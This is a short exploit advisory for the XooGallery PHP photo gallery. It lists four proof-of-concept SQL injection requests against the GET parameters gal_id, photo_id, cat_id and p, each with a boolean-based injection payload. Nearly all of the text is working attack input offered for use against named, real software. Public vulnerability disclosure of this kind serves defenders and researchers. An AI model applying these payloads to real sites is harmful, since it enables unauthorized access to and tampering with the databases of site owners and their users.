Exploit Title: XooGallery - Multiple SQL Injections

Date: 26.03.2019

Exploit Author: Ahmet Ümit BAYRAM

Vendor Homepage: https://xooscripts.com/product/html5-php-photo-gallery.html

Demo Site: http://xooscripts.com/demos/xoogallery/

Version: Lastest

Tested on: Kali Linux


—– PoC 1: SQLi —–

Request: http://localhost/[PATH]/gal.php?gal_id=1 Vulnerable Parameter: gal_id (GET) Payload: gal_id=29’ AND 2692=2692 AND ‘WCFf’=’WCFf

—– PoC 2: SQLi —–

Request: http://localhost/[PATH]/photo.php?photo_id=1 Vulnerable Parameter: photo_id (GET) Payload: photo_id=1’ AND 5479=5479#

—– PoC 3: SQLi —–

Request: http://localhost/[PATH]/cat.php?cat_id=1 Vulnerable Parameter: cat_id (GET) Payload: cat_id=1’ AND 9338=9338 AND ‘SZIH’=’SZIH

—– PoC 4: SQLi —–

Request: http://localhost/[PATH]/results.php?p=1 Vulnerable Parameter: p (GET) Payload: p=-8412’ OR 2597=2597#